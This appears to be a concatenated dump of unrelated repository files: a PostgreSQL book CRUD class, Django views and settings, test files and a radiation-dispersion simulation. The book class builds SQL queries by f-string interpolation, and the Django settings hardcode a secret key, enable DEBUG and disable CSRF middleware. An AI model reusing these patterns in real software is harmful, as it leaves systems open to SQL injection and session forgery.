seeder_file = open(self.seeder_file, 'r')
seeder_file_content = seeder_file.readlines()
formatted_seeder_file = ''.join(seeder_file_content)
self.cursor.execute(formatted_seeder_file)
self.connection.commit()
seeder_file.close()
return "Tables populated successfully in PostgreSQL"
except (Exception, Error) as err:
return f'Error while connecting to the PostgreSQL {err}'
def display_table_content(self):
db_query = f'SELECT * FROM books'
self.cursor.execute(db_query)
db_response = self.cursor.fetchall()
print(
f'-------------------------------------------- Table:books ---------------------------------------------\n')
for row in db_response:
print(row, '\n')
return db_response
def all(self, id):
db_query = f'''SELECT * FROM books WHERE user_id = {id};'''
self.cursor.execute(db_query)
db_response = self.cursor.fetchall()
for row in db_response:
print(row, '\n')
return db_response
def get(self, book_id):
db_query = f'SELECT * FROM books WHERE id = {book_id}'
self.cursor.execute(db_query)
db_response = self.cursor.fetchone()
print(db_response)
return db_response
def create(self, *args):
print('Book table before creating record')
self.display_table_content()
print('Table after creating record:')
db_insert = f'INSERT INTO books (id, user_id, name, pages, created_at, updated_at) VALUES {args}'
self.cursor.execute(db_insert)
self.connection.commit()
count = self.cursor.rowcount
self.display_table_content()
print(count, "Record created successfully in books table")
def update(self, id, *args):
print('Table before updating record')
print(self.get(id))
print('Table after updating record')
db_insert = f'UPDATE books SET (id, name, pages, created_at, updated_at) = {args} WHERE id = {id}'
self.cursor.execute(db_insert)
self.connection.commit()
count = self.cursor.rowcount
print(self.get(id))
print(count, "Record updated successfully in users table")
def destroy(self, id):
print('Books table before deleting record')
self.display_table_content()
print('Table after deleting record:')
delete_query = f'DELETE FROM books WHERE id = {id}'
self.cursor.execute(delete_query)
self.connection.commit()
count = self.cursor.rowcount
self.display_table_content()
print(count, "Record deleted successfully in books table")
def close_db_connections(self):
if self.connection:
self.cursor.close()
self.connection.close()
print('PostgreSQL connection is closed')
if __name__ == '__main__':
try:
book = Book()
print(book.load_schema_file())
print(book.load_seeder_file())
except Exception as err:
print("Sorry! we couldn't connect to the db, load schema and seed the table for operations", err)
else:
book.display_table_content()
# book.all(6)
# book.get(10)
# book.create(16, 3, 'Shuffletag', 638, '2021/4/1', '2021/7/27')
# book.update(1 , 1, 'Purpose', 500, '2019-06-14', '2021-01-28')
# book.destroy(10)
finally:
book.close_db_connections()
|
[
"olawale.kareem@decagon.dev"
] |
olawale.kareem@decagon.dev
|
653f6a0d408c0ad15a8e7355338bac74a7866aed
|
7e8cb602f8940e88187f46d184abd27233f845f9
|
/pages/item_page.py
|
7ba8332eee0e4fade97b63818f42e33abc1999e8
|
[] |
no_license
|
echpoch2/luchTests
|
9ba815e0ae207fbeabeb3989fa4e26a329cc56c9
|
c9b597a1c71e0b7ef80bca06a75bfa9dde918e5f
|
refs/heads/main
| 2023-02-06T02:31:23.327729
| 2020-12-30T06:18:50
| 2020-12-30T06:18:50
| 316,919,479
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
from .base_page import BasePage
from .locatorsItemPage import ItemPageLocators
from .locatorsCartPage import CartLocators
class ItemPage(BasePage):
def add_item_to_cart(self):
cart_button = self.browser.find_element(*ItemPageLocators.CART_BUTTON)
cart_button.click()
def get_item_price(self):
return self.browser.find_element(*CartLocators.TOTAL_PRICE)
def should_be_login_link(self):
assert self.is_element_present(*CartLocators.TOTAL_PRICE), "Login link is not presented"
|
[
"nice.naybich@gmail.com"
] |
nice.naybich@gmail.com
|
68fac6704815a22f20561049ae4d6538d0e45b93
|
9dbfa8251b8aa3ea4bec1fe34dcf4e6ce9b14c8f
|
/heytest/api/views/domingos.py
|
31ae4aa0a6f115221ab51d77b4f44635905d80aa
|
[] |
no_license
|
OOSSGL/heytest
|
0d1dbcdc32b630b24bf629c3ccabe35fa6599dc0
|
060f6ada72dbe82d2d7587ca9eec3a90cfce79eb
|
refs/heads/master
| 2022-11-16T00:16:55.886244
| 2020-07-14T19:47:16
| 2020-07-14T19:47:16
| 278,745,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 997
|
py
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from ..serializers import PruebaSerializer
from rest_framework.response import Response
# Created the objetc test
class Prueba(object):
def __init__(self, name, description, result):
self.name = name
self.description = description
self.result = result
@api_view(['GET'])
def getAnswer(request):
prueba = Prueba(
name="Prueba",
description="Esto es una prueba para ver si funciona",
result="IT WORKS!")
serializer = PruebaSerializer(prueba)
return Response(serializer.data)
@api_view(['GET'])
def getDomingos(request):
prueba = Prueba(
name="¿Cuántos Domingos?",
description="¿Durante el siglo 20 (1 de enero de 1901 hasta 31 de diciembre de "
+ "2000), cuántos meses han empezado un domingo?",
result="To be discovered")
serializer = PruebaSerializer(prueba)
return Response(serializer.data)
|
[
"oossgl@gmail.com"
] |
oossgl@gmail.com
|
049a732270d07ef3dce34a06bbabc393e05c27c3
|
470d12afaff0c6680bf2385ee244f2fbe78c81fd
|
/testing/urls.py
|
4fd8f1e4a211aa72050a4095ab49c9fa2b9d2070
|
[] |
no_license
|
stephbeaird/login
|
45ef8d848c013867e38e0c96a205b5ae45b6e58d
|
ae311f2465a47f15758c6c65c9c7adb4de18188d
|
refs/heads/master
| 2021-08-15T01:42:33.811426
| 2017-11-17T05:11:56
| 2017-11-17T05:11:56
| 111,060,925
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
"""testing URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('apps.first_app.urls'))
# url(r'create$', include('first_app/login.html'))
]
|
[
"stephaniebeaird@Stephanies-MacBook-Pro.local"
] |
stephaniebeaird@Stephanies-MacBook-Pro.local
|
7f0ca41d257a38b4fe60b4414053bdc91b331f50
|
727725607b0b50f7ec659295c21720e9cf1873f4
|
/ask/ask/settings.py
|
67189e948b39307f5115381eef5ee36faf536f90
|
[] |
no_license
|
sarnazi/stepic_web_project5
|
64f93b32f589a99494005d9c7a8f14c7bcad3fc8
|
40a14bb734c730eaf47f5fd4d5836b200657337c
|
refs/heads/master
| 2020-06-15T19:56:41.166431
| 2016-12-13T11:37:25
| 2016-12-13T11:37:25
| 75,266,749
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,241
|
py
|
"""
Django settings for ask project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0sk@ko^ur8&&!inzcs3s%v01djwo7#*(gs#5067r*$$))*%rer'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'autofixture',
'qa',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ask.urls'
WSGI_APPLICATION = 'ask.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.mysql',
'NAME': 'TEST',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
#AUTH_USER_MODEL = 'profile.user'
#AUTH_PROFILE_MODULE = 'qa.UserProfile'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
|
[
"sarnazi@mail.ru"
] |
sarnazi@mail.ru
|
bb58bfb6ff59c7cd398923d1965a866fd2b2066c
|
5899c0d62f3a1eb8aa854016365e3608c6aec037
|
/pyfire/tests/auth/test_registry.py
|
0c01883a419425d2b929196ab8538afda8b770ca
|
[
"BSD-3-Clause"
] |
permissive
|
IgnitedAndExploded/pyfire
|
288c67b95a8e904eb6da1bb443dd0086c171dbbb
|
2d84994593b9ac9cbab21dea24c4303e06b351fc
|
refs/heads/master
| 2021-06-10T16:41:46.754130
| 2011-11-27T15:59:20
| 2011-11-27T15:59:20
| 2,096,184
| 4
| 1
|
NOASSERTION
| 2021-05-22T21:30:24
| 2011-07-24T10:35:26
|
Python
|
UTF-8
|
Python
| false
| false
| 3,834
|
py
|
# -*- coding: utf-8 -*-
"""
pyfire.tests.auth.test_registry
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests builtin auth handling and backends
:copyright: 2011 by the pyfire Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from base64 import b64encode
import xml.etree.ElementTree as ET
import warnings
from pyfire.tests import PyfireTestCase
from pyfire.auth.registry import ValidationRegistry
from pyfire.auth.backends import DummyTrueValidator, DummyFalseValidator, \
InvalidAuthenticationError
class DummyTestValidator(DummyTrueValidator):
def __init__(self):
super(DummyTrueValidator, self).__init__()
self._shutdown = False
self._validated = False
def validate_userpass(self, username, password):
self._validated = True
def validate_token(self, token):
self._validated = True
def shutdown(self):
self._shutdown = True
class TestValidationRegistry(PyfireTestCase):
def setUp(self):
self.registry = ValidationRegistry()
def tearDown(self):
del self.registry
def test_registertwice(self):
handler = DummyFalseValidator()
self.registry.register('dummy', handler)
with self.assertRaises(AttributeError) as cm:
self.registry.register('dummy', handler)
def test_unregister_bad(self):
with self.assertRaises(AttributeError) as cm:
self.registry.unregister('dummy')
def test_unregister_good(self):
handler = DummyFalseValidator()
self.registry.register('dummy', handler)
self.registry.unregister('dummy')
def test_unregister_shutdown(self):
handler = DummyTestValidator()
self.registry.register('dummy', handler)
self.assertFalse(handler._shutdown)
self.registry.unregister('dummy')
self.assertTrue(handler._shutdown)
def test_validation_userpass_fail(self):
handler1 = DummyFalseValidator()
self.registry.register('dummy', handler1)
handler2 = DummyTestValidator()
self.registry.register('tester', handler2)
self.assertFalse(handler2._validated)
with self.assertRaises(InvalidAuthenticationError) as cm:
self.registry.validate_userpass('user', 'pass')
self.assertTrue(handler2._validated)
def test_validation_userpass_success(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
handler1 = DummyTrueValidator()
self.registry.register('dummy', handler1)
handler2 = DummyTestValidator()
self.registry.register('tester', handler2)
self.assertFalse(handler2._validated)
self.assertEqual(self.registry.validate_userpass('user', 'pass'), 'dummy')
self.assertFalse(handler2._validated)
def test_validation_token_fail(self):
handler1 = DummyFalseValidator()
self.registry.register('dummy', handler1)
handler2 = DummyTestValidator()
self.registry.register('tester', handler2)
self.assertFalse(handler2._validated)
with self.assertRaises(InvalidAuthenticationError) as cm:
self.registry.validate_token('token')
self.assertTrue(handler2._validated)
def test_validation_token_success(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
handler1 = DummyTrueValidator()
self.registry.register('dummy', handler1)
handler2 = DummyTestValidator()
self.registry.register('tester', handler2)
self.assertFalse(handler2._validated)
self.assertEqual(self.registry.validate_token('token'), 'dummy')
self.assertFalse(handler2._validated)
|
[
"mail@markus-ullmann.de"
] |
mail@markus-ullmann.de
|
365349fc60bd1251a6bd1ccf3014d2a1f36ad0a1
|
6aa2c826e379cb6bed8d3311927c340204feeed3
|
/app/api/transcribe.py
|
eae8a541104d515f2bd2c7cef065c51e222ddbb2
|
[] |
no_license
|
WillSmithTE/transcribe
|
e80d9fe815b953fddf24b26667af1b7ebcac208f
|
00822a4188292d9c671c61a6c1dca5fadab732ae
|
refs/heads/master
| 2023-03-04T05:49:40.705926
| 2023-02-25T23:35:03
| 2023-02-25T23:35:03
| 254,513,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
from flask import Blueprint, request
from app.service.gcloud import main, transcribeLocal, generateTranscript
from app.service.security import Forbidden, isValid, checkValid
transcribe_api = Blueprint('transcribe_api', __name__)
@transcribe_api.route('/transcribe', methods=['GET'])
def transcribe():
return main(request.args.get('url'))
@transcribe_api.route('/transcribeLocal', methods=['GET'])
def transcribeLocalApi():
return transcribeLocal(request.args.get('filename'))
@transcribe_api.route('/transcribeHosted', methods=['GET'])
def transcribeHostedApi():
return generateTranscript('gs://transcriptions_willsmithte/' + request.args.get('url'))
|
[
"willsmithte@gmail.com"
] |
willsmithte@gmail.com
|
2eca32fb896939418d73ef6d34691efd92662494
|
9788bb62a4cdb894f8a13c0facb652d7a3e15fa8
|
/login_app/views.py
|
a849e2dd65d7fca649f8840f6d86cc09f8801281
|
[] |
no_license
|
leongus1/favorite_books
|
f44241f0bdaf9f8db60c1d974e4349928acc7779
|
b1e222df54a23ead22a51f97268fda1eedcf6d3c
|
refs/heads/master
| 2023-01-10T05:55:24.327999
| 2020-10-30T01:52:14
| 2020-10-30T01:52:14
| 308,225,425
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,058
|
py
|
from django.shortcuts import render, redirect
from login_app.models import Users
import bcrypt
from django.contrib import messages
# Create your views here.
def index(request):
return render(request, 'index.html')
def check_log(request):
if len(Users.objects.filter(email=request.POST['email']))==0:
request.session['invalid_user_email']="No account with this email address"
return redirect('/')
else:
hash = Users.objects.get(email=request.POST['email']).password_hash
if bcrypt.checkpw(request.POST['pw'].encode(), hash.encode()):
user1 = Users.objects.get(email=request.POST['email'])
request.session['pw_match'] = 'password match'
request.session['user_id'] = user1.id
request.session['name']=user1.first_name
return redirect ('/books')
else:
print('password doesnt match')
request.session['bad_pw']="Invalid Password"
return redirect('/')
#create or update records
def register(request):
# context = {}
errors = Users.objects.user_validator(request.POST)
if len(Users.objects.filter(email=request.POST['email'])) > 0:
errors['acct_status']="There is already an account using this email address."
if errors:
for key, values in errors.items():
messages.error(request, values)
return redirect('/')
else:
pw_hash = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()
Users.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'], password_hash=pw_hash)
request.session['acct_status']='Account successfully created'
user1 = user1 = Users.objects.get(email=request.POST['email'])
request.session['user_id'] = user1.id
request.session['name']=user1.first_name
return redirect('/books')
def logout(request):
request.session.flush()
return redirect('/')
|
[
"leongus1@gmail.com"
] |
leongus1@gmail.com
|
565d99a79d80d15950a7a1a6508883cf2bfe05a7
|
00335788cd56ede0bda4e1dfb32437bfe1ee05e3
|
/tests/conftest.py
|
653c3397a892c8fcde4b9171ffce57157d2494a9
|
[] |
no_license
|
zoglam/candy_delivery_api
|
bb308bab813e1cef3ba8d010424a5d7c91318726
|
1621bb8bb306b327694f885c72e5110327c7b5a7
|
refs/heads/master
| 2023-07-05T21:46:06.651728
| 2021-03-29T19:06:57
| 2021-03-29T19:06:57
| 344,929,705
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,392
|
py
|
import warnings
import pytest
import docker as libdocker
from asgi_lifespan import LifespanManager
from fastapi import FastAPI
from httpx import AsyncClient
@pytest.fixture(scope="session")
def docker() -> libdocker.APIClient:
with libdocker.APIClient(version="auto") as client:
yield client
@pytest.fixture(scope="session", autouse=True)
def mariadb_server(docker: libdocker.APIClient) -> None:
warnings.filterwarnings("ignore", category=DeprecationWarning)
yield
return
# @pytest.fixture(autouse=True)
# async def apply_migrations(mariadb_server: None) -> None:
# alembic.config.main(argv=["upgrade", "head"])
# yield
# alembic.config.main(argv=["downgrade", "base"])
@pytest.fixture
# def app(apply_migrations: None) -> FastAPI:
def app(mariadb_server: None) -> FastAPI:
from app.main import app # local import for testing purpose
return app
@pytest.fixture
async def initialized_app(app: FastAPI) -> FastAPI:
async with LifespanManager(app):
yield app
# @pytest.fixture
# def pool(initialized_app: FastAPI) -> Pool:
# return initialized_app.state.pool
@pytest.fixture
async def client(initialized_app: FastAPI) -> AsyncClient:
async with AsyncClient(
app=initialized_app,
base_url="http://localhost",
headers={"Content-Type": "application/json"},
) as client:
yield client
|
[
"anzoor1998@gmail.com"
] |
anzoor1998@gmail.com
|
48dc205636e176aa2f4eb6f1bb7f6e4cb16c83b2
|
b2cda2ad7801184d0a42c588e4b4c1530c2225e5
|
/dipl-DVD-ROM/Asim/asim/simulation/simple.py
|
ac1fde0b456031c2e6ca9c3109b010a255675cc9
|
[] |
no_license
|
strohel/works
|
90777df7a6d7d57e2108ab3500cb7266460b53c2
|
4abb93baab1d89e2275af6ec04e0b2e4351a7e76
|
refs/heads/master
| 2021-01-01T18:48:50.886333
| 2014-06-03T21:32:26
| 2014-06-03T21:32:26
| 17,958,017
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,683
|
py
|
#!/usr/bin/env python
"""Run a simulation of an atmospheric radioactive realease using the puff model"""
import matplotlib.pyplot as plt
import numpy as np
import pybayes.wrappers._numpy as nw
import scipy.io
import cProfile
import glob
import os.path
import pstats
import subprocess
import time
from asim.dispmodel.iface import Location, Nuclide, SourceModel, MeteoModel, DispersionModel
from asim.dispmodel.nuclides import db as nuclide_db
from asim.dispmodel.puffmodel import PuffModel
from asim.support.directories import results_dir
from asim.support.plotters import plot_trajectories, plot_contour, plot_stations, plot_map
class StaticCompoLocSourceModel(SourceModel):
"""Source model that provides static implementation of
:meth:`~asim.dispmodel.iface.SourceModel.inventory` and
:meth:`~asim.dispmodel.iface.SourceModel.location`.
"""
def inventory(self):
ret = np.array([nuclide_db["Ar-41"]], dtype=Nuclide)
return ret
def location(self):
return Location(x=0.0, y=0.0, z=50.0)
class SimulatedSourceModel(StaticCompoLocSourceModel):
"""Source model that releases static pre-defined ammount of radionuclides."""
def __init__(self, puff_sampling_step, activities):
"""
:param int time_step: inverval between rate changes
:param list rates: total activities per while time slots
"""
self.puff_sampling_step = puff_sampling_step
self.rates = np.asarray(activities) / puff_sampling_step
def release_rate(self, time):
index = time // self.puff_sampling_step # integer-wise division
if index >= 0 and index < self.rates.shape[0]:
return self.rates[index]
else:
return np.zeros((self.rates.shape[1])) # rate is zero before and after release
class PasquillsMeteoModel(MeteoModel):
"""Abstract meteo model based on Pasquills stability category"""
def __init__(self, stability_category):
"""
:param int stability_category: Pasquills statiblity category A=0 ... F=5
"""
self.stability_category = stability_category
self.height_per_category = np.array([1300.0, 920.0, 840.0, 500.0, 400.0, 150.0])
def mixing_layer_height_at(self, loc, time):
return self.height_per_category[self.stability_category]
def dispersion_xy(self, loc, time, total_distance):
sigmaxyA = [1.503, 0.876, 0.659, 0.640, 0.801, 1.294]
sigmaxyB = [0.833, 0.823, 0.807, 0.784, 0.754, 0.718]
index = self.stability_category
if total_distance > 10000.:
exponent = sigmaxyB[index] - 0.5
return (sigmaxyA[index]*10000.**(exponent))*(total_distance**(0.5))
else:
return (sigmaxyA[index]*total_distance)**sigmaxyB[index]
def dispersion_z(self, loc, time, total_distance):
sigmazA = [0.151, 0.127, 0.165, 0.215, 0.264, 0.241]
sigmazB = [1.219, 1.108, 0.996, 0.885, 0.774, 0.662]
index = self.stability_category
return (sigmazA[index]*total_distance)**sigmazB[index]
class StaticMeteoModel(PasquillsMeteoModel):
"""Weather model that returns pre-computed numbers stored in .mat file."""
def __init__(self, meteo_array, stability_category, grid_step_xy = 3, grid_step_time = 3600):
"""
:param string matfile: path to Matlab .mat file with pre-computed grid of wind speed and direction
:param int stability_category: Pasquills statiblity category A=0 ... F=5
"""
PasquillsMeteoModel.__init__(self, stability_category)
self.METEO = np.asarray(meteo_array)
self.grid_step_xy = grid_step_xy
self.grid_step_time = grid_step_time
def wind_speed_at(self, loc, time):
tt = time // self.grid_step_time # integer-wise division.
ws11_0 = self.METEO[tt, 1, 0, 0]
ws12_0 = self.METEO[tt, 1, 0, 0]
ws21_0 = self.METEO[tt, 1, 0, 0]
ws22_0 = self.METEO[tt, 1, 0, 0]
ws11_1 = self.METEO[tt+1, 1, 0, 0]
ws12_1 = self.METEO[tt+1, 1, 0, 0]
ws21_1 = self.METEO[tt+1, 1, 0, 0]
ws22_1 = self.METEO[tt+1, 1, 0, 0]
"""
xgrid = loc.x // self.grid_step_xy + (self.METEO.shape[2]-1)/2.0
x = loc.x % self.grid_step_xy
ygrid = loc.y // self.grid_step_xy + (self.shape[3]-1)/2.0
y = loc.y % self.grid_step_xy
ws11_0 = METEO[tt, 1, xgrid, ygrid]
ws12_0 = METEO[tt, 1, xgrid, ygrid+1]
ws21_0 = METEO[tt, 1, xgrid+1, ygrid]
ws22_0 = METEO[tt, 1, xgrid, ygrid+1]
ws11_1 = METEO[tt+1, 1, xgrid, ygrid]
ws12_1 = METEO[tt+1, 1, xgrid, ygrid+1]
ws21_1 = METEO[tt+1, 1, xgrid+1, ygrid]
ws22_1 = METEO[tt+1, 1, xgrid, ygrid+1]
"""
ws_0 = self._bilinear_interp(ws11_0, ws12_0, ws21_0, ws22_0, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
ws_1 = self._bilinear_interp(ws11_1, ws12_1, ws21_1, ws22_1, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
coef = float(time % self.grid_step_time) / self.grid_step_time
return coef*(ws_1 - ws_0) + ws_0
def wind_direction_at(self, loc, time):
tt = time // self.grid_step_time # integer-wise division.
wd11_0 = self.METEO[tt, 0, 0, 0]
wd12_0 = self.METEO[tt, 0, 0, 0]
wd21_0 = self.METEO[tt, 0, 0, 0]
wd22_0 = self.METEO[tt, 0, 0, 0]
wd11_1 = self.METEO[tt+1, 0, 0, 0]
wd12_1 = self.METEO[tt+1, 0, 0, 0]
wd21_1 = self.METEO[tt+1, 0, 0, 0]
wd22_1 = self.METEO[tt+1, 0, 0, 0]
"""
xgrid = loc.x // self.grid_step_xy + (self.METEO.shape[2]-1)/2.0
x = loc.x % self.grid_step_xy
ygrid = loc.y // self.grid_step_xy + (self.shape[3]-1)/2.0
y = loc.y % self.grid_step_xy
wd11_0 = METEO[tt, 0, xgrid, ygrid]
wd12_0 = METEO[tt, 0, xgrid, ygrid+1]
wd21_0 = METEO[tt, 0, xgrid+1, ygrid]
wd22_0 = METEO[tt, 0, xgrid, ygrid+1]
wd11_1 = METEO[tt+1, 0, xgrid, ygrid]
wd12_1 = METEO[tt+1, 0, xgrid, ygrid+1]
wd21_1 = METEO[tt+1, 0, xgrid+1, ygrid]
wd22_1 = METEO[tt+1, 0, xgrid, ygrid+1]
"""
wd_0 = self._bilinear_interp(wd11_0, wd12_0, wd21_0, wd22_0, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
wd_1 = self._bilinear_interp(wd11_1, wd12_1, wd21_1, wd22_1, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
coef = float(time % self.grid_step_time) / self.grid_step_time
return coef*(wd_1 - wd_0) + wd_0
def _bilinear_interp(self, q11, q12, q21, q22, x1, y1, x2, y2, x, y):
"""Bilinear interpolation."""
return ( q11*(x2-x)*(y2-y)/(x2-x1)/(y2-y1) + q21*(x-x1)*(y2-y)/(x2-x1)/(y2-y1)
+ q12*(x2-x)*(y-y1)/(x2-x1)/(y2-y1) + q22*(x-x1)*(y-y1)/(x2-x1)/(y2-y1) )
def main(show_plot=True, create_video=False, profile=False):
if profile:
filename = "profile_" + __name__ + ".prof"
cProfile.runctx("run(show_plot, create_video)", globals(), locals(), filename)
s = pstats.Stats(filename)
s.sort_stats("time") # "time" or "cumulative"
s.print_stats(30)
s.print_callers(30)
else:
run(show_plot, create_video)
def run(show_plot, create_video):
simulation_length = 4*60*60 # 4 hours
time_step = 2*60 # 2 minutes
puff_sampling_step = 5*time_step
activities = np.array([[.1E+16], [3.0E+16], [4.0E+16], [2.0E+16], [3.0E+16], [1.0E+16]])
source_dir = os.path.dirname(__file__)
matfile = os.path.join(source_dir, "meteo.mat")
souce_model = SimulatedSourceModel(puff_sampling_step=puff_sampling_step, activities=activities)
meteo_model = StaticMeteoModel(meteo_array=scipy.io.loadmat(matfile)["METEO"], stability_category=3)
puff_model = PuffModel(time_step=time_step, puff_sampling_step=puff_sampling_step,
source_model=souce_model)
receptors_ = []
for i in range(-20, 21):
for j in range(-20, 21):
receptors_.append(Location(j*1000.0, i*1000.0, 0.))
receptors = np.array(receptors_, dtype=Location)
receptors_ = read_receptor_locations(os.path.join(source_dir, "receptory_ETE"))
off_grid_receptors = np.array(receptors_, dtype=Location)
del receptors_
time_steps = (simulation_length // time_step)
puff_count = len(activities)
trajectories = np.zeros((time_steps + 1, puff_count, 2))
total_doses = np.zeros(receptors.shape[0])
off_grid_doses = np.zeros((simulation_length // puff_sampling_step, off_grid_receptors.shape[0]))
clock_start, time_start = time.clock(), time.time()
for i in range(time_steps):
if i % (puff_sampling_step/time_step) == 0:
print
puff_model.propagate(meteo_model, souce_model)
dose_this_round = 0.0
for j in range(len(puff_model.puffs)):
loc = puff_model.puffs[j].loc
trajectories[i + 1, j, 0] = loc.x # let all trajectories start at 0
trajectories[i + 1, j, 1] = loc.y
for j in range(receptors.shape[0]):
loc = receptors[j]
dose = nw.sum_v(puff_model.dose_at(loc))
total_doses[j] += dose
dose_this_round += dose
for j in range(off_grid_receptors.shape[0]):
loc = off_grid_receptors[j]
index = (i * time_step) // puff_sampling_step
off_grid_doses[index, j] += nw.sum_v(puff_model.dose_at(loc))
print "Total dose in period [{0:5}s .. {1:5}s]: {2:.9f}".format(i*time_step, (i+1)*time_step, dose_this_round)
if create_video:
file = os.path.join(os.path.dirname(__file__), "video", "{0:0>5}s-{1:0>5}s.jpg".format(i*time_step, (i+1)*time_step))
fig = plt.figure()
axis = fig.add_subplot(1,1,0)
total_doses_np = np.reshape(total_doses, (41, 41))
plot_trajectories(axis, trajectories[0:i + 2, ...])
plot_contour(axis, total_doses_np, 41, 41, 1.0, 5)
plot_stations(axis, off_grid_receptors)
plot_map(axis)
axis.grid(True)
fig.savefig(file)
plt.close('all')
print "Wall time:", time.time() - time_start, "s, CPU time:", time.clock() - clock_start
scipy.io.savemat(results_dir('simulation.doses_at_locations'),
{"dose_of_model": off_grid_doses})
if create_video:
file = open(os.path.join(source_dir, "video", "video.avi"), 'wb')
args = ['jpegtoavi', '-f', '10', '800', '600']
files = sorted(glob.glob(os.path.join(source_dir, "video", "*.jpg")))
args.extend(files)
subprocess.check_call(args, stdout=file)
print "Video created:", file.name;
if show_plot:
fig = plt.figure()
axis = fig.add_subplot(1,1,1)
total_doses_np = np.reshape(total_doses, (41, 41))
plot_trajectories(axis, trajectories)
plot_contour(axis, total_doses_np, 41, 41, 1.0, 5)
plot_stations(axis, off_grid_receptors)
plot_map(axis)
axis.grid(True)
plt.show()
def read_receptor_locations(path):
"""Loads list of receptors from a file
:return: list of :class:`Locations <asim.dispmodel.iface.Location>` with receptor locations
"""
receptors = []
f = open(path, "r")
s = f.readlines()
for line in s[0:len(s)]:
singleLine = line.rstrip()
name = singleLine[14:42] # currently unused
north = float(singleLine[42:54])
east = float(singleLine[54:62])
receptors.append(Location(north, east, 0.))
f.close()
return receptors
if __name__ == "__main__":
main()
|
[
"matej@laitl.cz"
] |
matej@laitl.cz
|
20010f4c4d06be295511a00b1886e43b03a7ad83
|
78202fcc20ca1569302f1b6e32c34d91bd066a76
|
/04-if-d.py
|
497bd0c5832b9eac7e13e2a277ad266f0d8c1d5b
|
[] |
no_license
|
133116/xuqi4
|
45bfdd376dc7bd140848f831430995826f9aefd2
|
7284a8adaa91822d806c782a3efd7b78e107260a
|
refs/heads/master
| 2020-06-13T00:17:45.420476
| 2019-06-30T04:22:28
| 2019-06-30T04:22:28
| 194,470,934
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 54
|
py
|
#最简单的for
for i in range(1,10,2):
print(i)
|
[
"52123323+loveyouforever04@users.noreply.github.com"
] |
52123323+loveyouforever04@users.noreply.github.com
|
b55af8f3fe846910d53ffaf4dee47e939f9267f3
|
ab2e968f37364a5c6d20a5a4831c332892926059
|
/todolist/jinja2.py
|
1e5262451a566dd1a261c0569661b5e6ff8d5b9b
|
[
"MIT"
] |
permissive
|
hirune525/todolist
|
3c4ecbe634772ca3f32310edcf6eb33ec69b1d0b
|
7c3b3870b20316d02d76f8e88453e00984122f4d
|
refs/heads/master
| 2021-01-20T17:21:36.303486
| 2017-05-21T09:31:01
| 2017-05-21T09:31:01
| 90,870,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 402
|
py
|
# -*- coding:utf-8 -*
from jinja2 import Environment
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.urlresolvers import reverse
from datetime import datetime
def environment(**options):
env = Environment(**options)
env.globals.update({
'static': staticfiles_storage.url,
'url': reverse,
'now': datetime.now,
})
return env
|
